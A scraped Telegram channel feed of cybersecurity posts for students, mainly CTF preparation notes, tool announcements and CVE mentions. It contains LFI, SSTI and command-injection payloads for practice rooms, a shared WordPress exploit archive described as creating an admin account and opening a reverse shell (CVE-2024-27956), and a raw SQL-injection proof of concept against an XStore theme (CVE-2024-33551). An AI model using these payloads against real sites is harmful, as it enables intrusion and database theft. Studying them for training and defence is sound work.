SecList for CyberStudents
241 subscribers
599 photos
25 videos
211 files
911 links
Think outside the box
Download Telegram
Forwarded from Cat Seclist
Hackyx - A cybersecurity search engine for IT security resources like #CTF writeups and #BugBounty reports.
» https://hackyx.io/
🔥1
Forwarded from Cat Seclist
Hi everyone checkout the new tool Dnsbruter which is an asynchronous Dns brutforcing and Fuzzing tool to brutforce and get subdomains which can handle high loads wordlist, threads etc with custome resolvers which will be a new replacing tool for puredns to not crash your network anymore, to install the Dnsbruter see here: https://github.com/RevoltSecurities/Dnsbruter
codeby.games room: Regular page

Vulnerable Type: LFI

Simple payload: /../../../../flag.txt

#Preparation #For #CTF
🔥1
codeby.games room: Congratulations application

Vulnerable Type: SSTI

Payload: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2---dump-all-config-variables —> {{config.items()}}

Discover SSTI with curl: curl -g 'https://example.com:PORT/{{7*7}}'

#Preparation #For #CTF
🔥1
Forwarded from Cat Seclist
WordPress_Auto_Admin_Account_and_Reverse_Shell_cve_2024_27956.zip
3 KB
cve-2024-27956
*
WordPress Auto Admin Account Creation and Reverse Shell.
*
Дырка в плагине wp-automatic для выполнения SQL-запросов.

#wordpress
TUIT_CTF ning birinchi bosqichi yakunlandi. Jamoamiz bilan 5-o'rinni egallab, 2-bosqichga yo'l oldik. 2-bosiqich 23-may kuni offline shaklda bo'lib o'tadi.

#CTF #Scoreboard
🔥5
Forwarded from Codeby
ШХ. Подоборка инструментов для OSINT

Приветствую всех читателей статьи! Сегодня будет очередная подборка различных инструментов, которые будут являться довольно неплохим дополнение к арсеналу любого кибер-разведчика по открытым источникам.

📌 Читать статью

#osint #software
CVE-2024-33551
Уязвимость SQL inj, обнаруженная в 8theme XStore, платформе электронной коммерции, созданной на базе WordPress.
Уязвимость позволяет команды SQL в базе данных.
*
POC
POST /?s=%27%3B+SELECT+*+FROM+wp_posts%3B+-- HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Upgrade-Insecure-Requests: 1


#wordpress #sql
codeby.games room: Calculator

Vulnerable Type: command injection

Payload: cat index.php

#Preparation #For #CTF